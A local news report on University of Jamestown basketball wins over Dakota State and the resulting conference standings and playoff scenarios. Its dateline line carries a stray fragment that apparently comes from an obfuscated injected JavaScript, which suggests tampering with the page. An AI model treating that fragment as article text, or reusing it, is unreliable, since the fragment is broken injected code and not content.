JAMESTOWN aasaf|var|u0026u|referrer|thtnb||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Second-to-last regular season games for the University of Jamestown basketball teams in the books last night, as the Jimmies picked up two wins to set up a fun Saturday at the Jamestown Civic Center. Neither game was as close as they scores would indicate. The Jimmie women knocked out Dakota State, 62-52. The men stormed out to a 22-point first-half lead and held off the Trojans, 92-70.

Jamestown now controls their own destiny in terms of the No. 1-seed for the NSAA Tournament and an outright conference championship. Via Mayville State’s win at Valley City State last night, the Jimmies are back alone at the top of the conference. The loss gives Jamestown at least a share of the North Star title for a second consecutive year.

Jessica Buck lead the Jimmies with 15. Kyra Dewald added 12. Jamestown was without Chelsey Frydenlund, the team’s second leading scorer, who headed to the ER for precautionary reasons just minutes before tip-off.

The Jimmies shot the lights out in this one and dominated the glass. That’s a pretty good recipe for a victory. Jamestown made eight of their first nine triples and out-rebounded Dakota State by 21. The Jimmies win coupled with a Presentation win over Dickinson State creates a three-way tie for the top spot in the NSAA.

If all three teams in the NSAA that are tied for first (UJ, DaSU, PC) win on Saturday the Jimmies would be the play-offs No. 1-seed.

Final home games are scheduled for Saturday at 4pm/6pm vs. Mayville State. The women will host on Wednesday in the opening round of the NSAA play-offs and if the men host as well that would be come a double-header. If the men are on the road, they would play Thursday.
